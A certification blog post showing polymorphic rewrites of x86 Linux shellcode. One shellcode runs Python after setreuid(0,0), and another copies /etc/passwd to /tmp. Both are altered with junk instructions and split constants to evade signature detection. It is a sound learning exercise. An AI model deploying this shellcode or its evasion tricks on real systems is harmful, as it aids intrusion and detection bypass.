SLAE: Polymorphic Shellcode

Hi all,
this is the sixth article about the SLAE (SecurityTube Linux Assembly Expert) course.
This time I need to make polymorphic versions of 3 shellcodes.

I start from the following shellcode:

; Title: Shellcode Linux x86 [54Bytes] Run /usr/bin/python | setreuid(),execve()
; Date: 8/5/2014
; Author: Ali Razmjoo
; Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]

global _start
section .text
_start:
  xor eax,eax
  mov al,0x46            ; setreuid
  xor ebx,ebx            ; ruid = 0
  xor ecx,ecx            ; euid = 0
  int 0x80
  jmp short call_exec
exec:
  pop ebx                ; ebx -> "/usr/bin/python" (15 bytes)
  xor eax,eax
  mov [ebx+0xf],al       ; null terminator right after the string
  mov [ebx+0x10],ebx     ; argv[0] = pointer to the string
  mov [ebx+0x14],eax     ; argv[1] = NULL (also used as the empty envp)
  mov al,0xb             ; execve
  lea ecx,[ebx+0x10]     ; argv
  lea edx,[ebx+0x14]     ; envp
  int 0x80
call_exec:
  call exec
string: db "/usr/bin/python"

This becomes:
global _start
section .text
_start:
  ; xor eax,eax replaced by an equivalent two-instruction sequence
  mov ebx,eax
  xor eax,ebx            ; eax ^ eax = 0 (ebx is cleared again below)

  std ; added some junk (DF is cleared again by cld below)
  mov al,0x46            ; setreuid(0,0)
  xor ebx,ebx
  xor ecx,ecx
  cld ; junk
  int 0x80
  jmp short call_exec
exec:
  pop ebx                ; ebx -> "///usr//bin///python" (20 = 0x14 bytes)
  xor eax,eax
  add esi, 0x20 ; junk
  mov [ebx+0x14],al      ; null terminator moved to the new string length
  mov [ebx+0x15],ebx     ; argv[0] = pointer to the string
  sub esi, 0x20 ; junk (undoes the add above)
  mov [ebx+0x19],eax     ; argv[1] = NULL (also used as the empty envp)
  mov al,0xb             ; execve
  lea ecx,[ebx+0x15]     ; argv
  lea edx,[ebx+0x19]     ; envp
  int 0x80
call_exec:
  call exec
string: db "///usr//bin///python"

To beat pattern matching I changed /usr/bin/python to ///usr//bin///python (the kernel resolves both to the same file, so the execve offsets just shift by the five extra bytes) and I added some NOP-equivalent instructions.
Finally I changed xor eax,eax to an equivalent instruction sequence.

- - -

You can find all the code in the following Github dir!

Here is the second polymorphic shellcode (look up the initial shellcode for comparison):
global _start
section .text
_start:
  ; xor eax,eax replaced by an equivalent two-instruction sequence
  mov ebx,eax
  xor eax,ebx

  mov al,0x5             ; open
  xor ecx,ecx            ; flags = O_RDONLY
  push ecx               ; string terminator

  ; push 0x64777373 ("sswd") rebuilt from a split immediate
  mov esi, 0x53666262
  add esi, 0x11111111
  push esi

  ; push 0x61702f63 ("c/pa") rebuilt the same way
  mov esi, 0x505f1e52
  add esi, 0x11111111
  push esi

  push 0x74652f2f        ; "//et"
  lea ebx,[esp +1]       ; ebx -> "/etc/passwd"
  int 0x80

  mov ebx,eax            ; fd
  mov al,0x3             ; read
  mov edi,esp            ; buffer on the stack
  mov ecx,edi
  push WORD 0xffff
  pop edx                ; count
  int 0x80
  mov esi,eax            ; bytes read

  push 0x5
  pop eax                ; open
  add ecx,0x40 ; junk
  xor ecx,ecx
  push ecx               ; string terminator
  push 0x656c6966        ; "file"
  push 0x74756f2f        ; "/out"
  push 0x706d742f        ; "/tmp"
  mov ebx,esp            ; ebx -> "/tmp/outfile"
  mov cl,0102o           ; O_WRONLY|O_CREAT (octal)
  push WORD 0644o
  pop edx                ; mode 0644
  int 0x80

  mov ebx,eax            ; fd
  push 0x4
  pop eax                ; write
  mov ecx,edi            ; buffer
  mov edx,esi            ; bytes read
  int 0x80

  xor eax,eax
  xor ebx,ebx
  mov al,0x1             ; exit
  mov bl,0x5
  int 0x80

This time I changed the pushed string. Instead of pushing the constant directly, I first move into esi the value minus a fixed constant and then add the same constant back to obtain the original value. These parts are marked in the listing with the original push instruction left as a comment.

I applied the same change to the last shellcode.
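The two substitutions used above (the split immediates in the second shellcode and the longer execve path in the first) can be checked without assembling anything. This is an added helper written for this write-up, not code from the course or the original shellcode authors; the function names and the search for a null-free constant are my own additions.

```python
"""Check the polymorphic substitutions used in this write-up:
split immediates (mov esi, X ; add esi, Y) and the extra-slash execve path,
whose added bytes shift the terminator/argv/envp offsets."""
import posixpath

MASK32 = 0xFFFFFFFF


def has_null_byte(dword: int) -> bool:
    """True if any of the four bytes of a 32-bit immediate is 0x00."""
    return any((dword >> shift) & 0xFF == 0 for shift in (0, 8, 16, 24))


def split_immediate(target: int, delta: int) -> tuple:
    """Return (mov_imm, add_imm) so that 'mov esi, mov_imm ; add esi, add_imm'
    leaves target in esi, with the same 32-bit wraparound as the CPU."""
    return (target - delta) & MASK32, delta


def find_nullfree_delta(target: int, start: int = 0x11111111) -> int:
    """Smallest delta >= start such that neither delta nor target-delta
    contains a null byte (the usual constraint on string-based payloads)."""
    delta = start
    while has_null_byte(delta) or has_null_byte((target - delta) & MASK32):
        delta += 1
    return delta


def execve_offsets(path: str) -> dict:
    """Offsets from the string label for the in-place execve layout above:
    null terminator after the path, argv[0] pointer next, then the NULL
    that ends argv and doubles as the empty envp."""
    n = len(path.encode())
    return {"null": n, "argv": n + 1, "envp": n + 5}


def same_path(a: str, b: str) -> bool:
    """Repeated slashes do not change the file the kernel resolves."""
    return posixpath.normpath(a) == posixpath.normpath(b)


if __name__ == "__main__":
    for target in (0x64777373, 0x61702F63):  # "sswd" and "c/pa" from above
        mov_imm, add_imm = split_immediate(target, 0x11111111)
        print(f"{target:#x} = {mov_imm:#x} + {add_imm:#x}")
    print(execve_offsets("/usr/bin/python"))
    print(execve_offsets("///usr//bin///python"))
```

Running it reproduces the 0x53666262 / 0x505f1e52 constants and the 0xf/0x10/0x14 to 0x14/0x15/0x19 offset shift seen in the listings.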

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE - 772